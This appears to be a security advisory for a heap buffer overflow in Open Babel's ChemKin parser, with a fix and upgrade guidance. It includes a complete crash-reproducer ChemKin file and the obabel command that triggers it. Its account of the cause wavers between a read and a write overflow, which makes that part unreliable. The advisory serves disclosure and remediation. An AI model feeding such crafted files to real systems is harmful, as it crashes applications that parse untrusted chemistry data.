CVE-2025-10997: Open Babel Heap Buffer Overflow in ChemKin Parser
A crafted ChemKin reaction file can corrupt heap memory in Open Babel's species-lookup code, crashing any application that parses untrusted chemistry files.
The problem
The function `ChemKinFormat::CheckSpecies` in `src/formats/chemkinformat.cpp` reads species tokens from a ChemKin REACTIONS block and passes them directly into a `std::map::find` call with no length or bounds validation.
An oversized or malformed species token corrupts the internal string buffer used as the map key. Under ASAN the crash is a heap-buffer-overflow READ of 8 bytes past the allocation boundary, inside `std::map::find` at `stl_map.h:1170`. The overflow is reachable from `ReadReactionQualifierLines`, which calls `CheckSpecies` for every species token on a reaction line.
Proof of concept
A working proof-of-concept for CVE-2025-10997 in openbabel, with the exact payload below.
! Minimized ChemKin reproducer for CVE-2025-10997
! Save as crash.ck and run: obabel -i ck crash.ck -o smi
ELEMENTS
H O N C
END
SPECIES
H2 O2 H2O
END
REACTIONS
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+H2O=H2+OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO 1.0E+13 0.0 0.0
ENDThe ChemKin format uses fixed-column-width fields (16 chars per species name in the canonical spec). Before the patch, `CheckSpecies` performed no length guard: it took the raw parsed token string and used it as a `std::map<std::string, ...>::find` key. When the token was much longer than the internally allocated SSO threshold or any assumed field width, the `std::string` construction itself or a prior `strncpy`-style copy into a fixed heap buffer wrote past the allocation boundary, corrupting adjacent heap metadata.
The fix (commit af4a4212, consolidated in PR #2913) added an explicit length check, rejecting any species token that exceeds the valid field width before it touches the map. CWE-122 (Heap-based Buffer Overflow) applies directly.
The fix
Upgrade to Open Babel 3.2.0 (released 2026-05-26), which contains the fix in commit af4a4212 via PR #2913. If upgrading is not immediately possible, avoid exposing `obabel`, `OBConversion`, or any language binding to untrusted ChemKin files. Distributions shipping 3.1.1 (Debian, Ubuntu, etc.) should apply the distro security patch referenced in the advisory.
Reported by OSS-Fuzz (Google).
Related research
- high · 7.8CVE-2022-43467CVE-2022-43467: Open Babel PQS Parser Out-of-Bounds Write
- high · 7.8CVE-2022-43607CVE-2022-43607: Open Babel MOL2 Parser Stack Buffer Overflow
- high · 7.8CVE-2022-46289CVE-2022-46289: Open Babel ORCA nAtoms Heap Buffer Overflow
- high · 7.8CVE-2022-46290CVE-2022-46290: Open Babel ORCA Parser Heap Buffer Overflow